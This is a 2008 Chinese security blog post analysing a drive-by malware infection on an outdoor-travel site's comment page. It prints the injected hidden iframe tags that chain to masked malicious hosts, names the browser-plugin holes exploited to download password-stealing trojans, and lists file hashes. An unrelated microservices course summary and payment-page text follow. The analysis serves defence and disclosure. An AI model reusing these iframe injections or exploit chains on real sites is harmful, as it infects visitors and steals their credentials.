某中国户外资料网驴友评论页面挂马Trojan.PSW.Win32.GameOL.ojr等

本文记录了作者在浏览某户外资料网站时遭遇的挂马事件,详细分析了多种类型的恶意脚本及利用各种软件漏洞下载恶意文件的过程。

某中国户外资料网驴友评论页面挂马Trojan.PSW.Win32.GameOL.ojr等

endurer 原创

2008-08-03 第1


在Google梅里雪山的资料时,打开某中国户外资料网的驴友评论页面hxxp://www.*8***2*6**4.com/comment/15267,瑞星提示:

病毒名称 处理结果 查杀方式 访问染毒文件的进程 文件
Trojan.DL.Script.JS.Agent.dn 清除成功 文件监控 D:/PROGRAM FILES/MAXTHON/MAXTHON.EXE C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/E8I5NP4S/fxx[1].htm
Trojan.DL.Script.JS.Agent.dn 直接跳过网页中的脚本网页监控 "D:/Program Files/Maxthon/Maxthon.exe" C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/286060899088.tmp
Trojan.DL.Script.JS.Agent.dn 直接跳过网页中的脚本网页监控 "D:/Program Files/Maxthon/Maxthon.exe" C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/286060899088.tmp
Trojan.DL.Script.JS.Agent.dn 清除成功 文件监控 D:/PROGRAM FILES/MAXTHON/MAXTHON.EXE C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/E8I5NP4S/fxx[2].htm
Trojan.DL.Script.JS.Agent.dn 直接跳过网页中的脚本网页监控 "D:/Program Files/Maxthon/Maxthon.exe" C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/286060899088.tmp
Trojan.DL.Script.JS.Agent.dn 直接跳过网页中的脚本网页监控 "D:/Program Files/Maxthon/Maxthon.exe" C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/286060899088.tmp
Trojan.DL.Script.JS.Agent.dn 清除成功 文件监控 D:/PROGRAM FILES/MAXTHON/MAXTHON.EXE C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/E8I5NP4S/fxx[3].htm
Trojan.DL.Script.JS.Agent.dn 清除成功 文件监控 D:/PROGRAM FILES/MAXTHON/MAXTHON.EXE C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/BLN0E2XG/fxx[1].htm
Trojan.DL.Script.JS.Agent.dn 清除成功 文件监控 D:/PROGRAM FILES/MAXTHON/MAXTHON.EXE C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/BLN0E2XG/fxx[2].htm
Trojan.DL.Script.JS.Agent.dn 直接跳过网页中的脚本网页监控 "D:/Program Files/Maxthon/Maxthon.exe" C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/286060899208.tmp

检查网页代码,发现:
#1 hxxp://www.*8***2*6**4.com/comment/15267
/---
<iframe src=hxxp://www.p**dh**0*01.cn/b3.htm width=50 height=0 border=0></iframe>
---/

#1.1 hxxp://www.p**dh**0*01.cn/b3.htm 包含代码:
/---
<Iframe src="hxxp://user1**.j*zm*01**7.cn/a3/fxx.htm" width=100 height=0></iframe>
<Iframe src="hxxp://j*zm*01**5.cn/fx.htm" width=100 height=0></iframe>
<Iframe src="hxxp://j*zm*01**5.cn/ac.htm" width=100 height=0></iframe>
---/


#1.1.1 hxxp://user1**.j*zm*01**7.cn/a3/fxx.htm 输出以下页面:

#1.1.1.1 hxxp://user1**.j*zm*01**7.cn/a3/ss.html

利用 Outlook Express的wab.exe的 MS Office Snapshot Viewer ActiveX ("snpvw.Snapshot Viewer Control.1")Exploit 漏洞 下载 hxxp://down**.h**s7**yu*e.cn/new/a3.css

文件说明符 : E:/test/a3.css
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-8-3 17:37:28
修改时间 : 2008-8-3 17:37:30
大小 : 24752 字节 24.176 KB
MD5 : 75d4e9b54a5c6f986c55d5a6f9b201b5
SHA1: 7D5DC946A99150FABE527DFB9DDC02E79A015B4D
CRC32: c501efe6

卡巴斯基报为:Trojan.Win32.Agent.wnu,瑞星报为:Trojan.PSW.Win32.GameOL.ojr

#1.1.1.2 利用 新浪DLoader Class ActiveX控件(clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A,Downloader.DLoader.1)任意文件下载漏洞下载 hxxp://down**.h**s7**yu*e.cn/down/sina.exe

文件说明符 : E:/test/sina.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-8-3 17:38:22
修改时间 : 2008-8-3 17:38:24
大小 : 24755 字节 24.179 KB
MD5 : f77c8813a1f339dc1d33e857698f3bad
SHA1: 250D9DA105EA3236965A1E61EB9665CB5444EAD7
CRC32: 88d6a14d

卡巴斯基报为:Trojan.Win32.Agent.wnu,瑞星报为:Trojan.PSW.Win32.GameOL.ojr


#1.1.1.3 hxxp://user1**.j*zm*01**7.cn/a3/ms06014.js

利用 ms06-014漏洞下载 hxxp://down**.h**s7**yu*e.cn/new/a3.css

#1.1.1.4

下载利用flash播放器(clsid:d27cdb6e-ae6d-11cf-96b8-444553540000,ShockwaveFlash.ShockwaveFlash.9)漏洞的文件hxxp://j*zm*01**5.cn/i115.swf,hxxp://j*zm*01**5.cn/f115.swf

文件说明符 : E:/test/i115.swf
属性 : A---
数字签名:否
PE文件:否
创建时间 : 2008-8-3 17:46:27
修改时间 : 2008-8-3 17:46:28
大小 : 1333 字节 1.309 KB
MD5 : e7a88a4f7675548abf33125340a4e1ef
SHA1: C520DC487D5A94E37D33C2DA495453FB69A6EDED
CRC32: 9c053649

卡巴斯基报为:Exploit.SWF.Downloader.eh,瑞星报为:Hack.Exploit.Swf.a

文件说明符 : E:/test/f115.swf
属性 : A---
数字签名:否
PE文件:否
创建时间 : 2008-8-3 17:50:24
修改时间 : 2008-8-3 17:50:26
大小 : 1334 字节 1.310 KB
MD5 : 1b32c1a8689773858b3a3fa737ad81fd
SHA1: 20A1A4E9C0A8AED87F36D8989286A8C9E1BA7F29
CRC32: fe71dc31

卡巴斯基报为:Exploit.SWF.Downloader.eh,瑞星报为:Hack.Exploit.Swf.a

#1.1.1.5

利用uusee(clsid:2CACD7BB-1C59-4BBB-8E81-6E83F82C813B,UUUPGRADE.UUUpgradeCtrl.1)漏洞
从 hxxp://down**.h**s7**yu*e.cn/down/ 下载 恶意程序文件

#1.1.1.6 hxxp://user1**.j*zm*01**7.cn/a3/GLWORLD.html (瑞星报为:Hack.Exploit.Script.JS.Bucode.c)


利用联众(clsid:61F5C358-60FB-4A23-A312-D2B556620F20,GLIEDown.IEDown.1)漏洞下载hxxp://down**.h**s7**yu*e.cn/new/a3.css

#1.1.1.7 hxxp://user1**.j*zm*01**7.cn/a3/real.js

利用RealPlayer(IERPCtl.IERPCtl.1)漏洞下载 hxxp://down**.h**s7**yu*e.cn/new/a3.css

#1.1.1.8 hxxp://user1**.j*zm*01**7.cn/a3/Real.html

利用RealPlayer(clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA)漏洞下载 hxxp://down**.h**s7**yu*e.cn/new/a3.css


#1.1.1.9 利用百度工具条(BaiduBar.Tool)下载 hxxp://down**.h**s7**yu*e.cn/down/Baidu.cab,内含 ko.exe

文件说明符 : E:/test/Baidu.cab
属性 : A---
数字签名:否
PE文件:否
创建时间 : 2008-8-3 17:53:8
修改时间 : 2008-8-3 17:53:10
大小 : 21503 字节 20.1023 KB
MD5 : 061d55e5a7c83c3811fe65e4a3b88001
SHA1: 95AF393F6B9541A735028A3A549E400E86A1E6AD
CRC32: f97b906a

文件说明符 : E:/test/ko.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-8-3 17:53:13
修改时间 : 2008-7-24 10:33:58
大小 : 21580 字节 21.76 KB
MD5 : 65447ffa08b8990d6a5887cb66e88a70
SHA1: 085CC23928087892EFB7314E3FDAE8325E0C1AB2
CRC32: ab4079ec

卡巴斯基报为:Trojan-Downloader.Win32.Agent.wps,瑞星报为:Trojan.DL.Win32.Game.a

#1.1.1.10 hxxp://user1**.j*zm*01**7.cn/a3/Thunder.html

利用迅雷(clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F,DPClient.Vod)漏洞下载 hxxp://down**.h**s7**yu*e.cn/new/a3.css


#1.1.2 hxxp://j*zm*01**5.cn/fx.htm
输出以下页面:

#1.1.2.1 hxxp://j*zm*01**5.cn/ilink.html

检测IE浏览器上的flash播放器版本并相应的下载 i115.swf、i64.swf、i47.swf、i45.swf、i28.swf、i16.swf

文件说明符 : E:/test/i16.swf
属性 : A---
数字签名:否
PE文件:否
创建时间 : 2008-8-3 18:0:13
修改时间 : 2008-8-3 18:0:14
大小 : 1332 字节 1.308 KB
MD5 : 715ba3cc3518d13f18be330b49686f30
SHA1: 239CBBC9AFC14F424908BEA404323D4A96D70B94
CRC32: 4ef344da

卡巴斯基报为:Exploit.SWF.Downloader.eh,瑞星报为:Hack.Exploit.Swf.a

文件说明符 : E:/test/i28.swf
属性 : A---
数字签名:否
PE文件:否
创建时间 : 2008-8-3 18:0:13
修改时间 : 2008-8-3 18:0:14
大小 : 1332 字节 1.308 KB
MD5 : c2ec382f6711b90d258131658299e8a3
SHA1: A48172942113B3AA6244668993C3D6C91E72905F
CRC32: 0afad039

卡巴斯基报为:Exploit.SWF.Downloader.eh,瑞星报为:Hack.Exploit.Swf.a


文件说明符 : E:/test/i45.swf
属性 : A---
数字签名:否
PE文件:否
创建时间 : 2008-8-3 18:0:13
修改时间 : 2008-8-3 18:0:14
大小 : 1333 字节 1.309 KB
MD5 : 1fdcf9004348fc6da39f2c04faad662d
SHA1: D459EB5540460864AB8E96B3F12FA85AC2B6FA45
CRC32: 1a3da06f

卡巴斯基报为:Exploit.SWF.Downloader.eh,瑞星报为:Hack.Exploit.Swf.a

i47.swf 同 i45.swf


文件说明符 : E:/test/i64.swf
属性 : A---
数字签名:否
PE文件:否
创建时间 : 2008-8-3 18:0:13
修改时间 : 2008-8-3 18:0:14
大小 : 1333 字节 1.309 KB
MD5 : 248d65b4639237f2cc97db3c910629e0
SHA1: 261278838940FD189BD315CF5C839D22DA17FDE1
CRC32: ab1f0d37

卡巴斯基报为:Exploit.SWF.Downloader.eh,瑞星报为:Hack.Exploit.Swf.a

#1.1.2.2 hxxp://j*zm*01**5.cn/ilink.html

检测FireFox浏览器上的flash播放器版本并相应的下载 i115.swf、i64.swf、i47.swf、i45.swf、i28.swf、i16.swf


#1.1.3 hxxp://j*zm*01**5.cn/ac.htm

利用 Outlook Express的wab.exe的MS Office Snapshot Viewer ActiveX ("snpvw.Snapshot Viewer Control.1")Exploit 漏洞 下载 hxxp://down**.h**s7**yu*e.cn/down/ac.css

文件说明符 : E:/test/ac.css
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-8-3 17:57:9
修改时间 : 2008-8-3 17:57:10
大小 : 24757 字节 24.181 KB
MD5 : 96ba09e9d83d39594e4d0b4e6721b982
SHA1: 4C213C156617BC8E9B919AA1904ADE7C7D9CB749
CRC32: f29acf04

卡巴斯基报为:Trojan.Win32.Agent.wnu,瑞星报为:Trojan.PSW.Win32.GameOL.ojr

内容概要:本文详细介绍了“秒杀商城”微服务架构的设计与实战全过程,涵盖系统从需求分析、服务拆分、技术选型到核心功能开发、分布式事务处理、容器化部署及监控链路追踪的完整流程。重点解决了高并发场景下的超卖问题,采用Redis预减库存、消息队列削峰、数据库乐观锁等手段保障数据一致性,并通过Nacos实现服务注册发现与配置管理,利用Seata处理跨服务分布式事务,结合RabbitMQ实现异步下单,提升系统吞吐能力。同时,项目支持Docker Compose快速部署和Kubernetes生产级编排,集成Sleuth+Zipkin链路追踪与Prometheus+Grafana监控体系,构建可观测性强的微服务系统。; 适合人群:具备Java基础和Spring Boot开发经验,熟悉微服务基本概念的中高级研发人员,尤其是希望深入理解高并发系统设计、分布式事务、服务治理等核心技术的开发者;适合工作2-5年、有志于转型微服务或提升架构能力的工程师; 使用场景及目标:①学习如何基于Spring Cloud Alibaba构建完整的微服务项目;②掌握秒杀场景下高并发、超卖控制、异步化、削峰填谷等关键技术方案;③实践分布式事务(Seata)、服务熔断降级、链路追踪、统一配置中心等企业级中间件的应用;④完成从本地开发到容器化部署的全流程落地; 阅读建议:建议按照文档提供的七个阶段循序渐进地动手实践,重点关注秒杀流程设计、服务间通信机制、分布式事务实现和系统性能优化部分,结合代码调试与监控工具深入理解各组件协作原理,真正掌握高并发微服务系统的构建能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值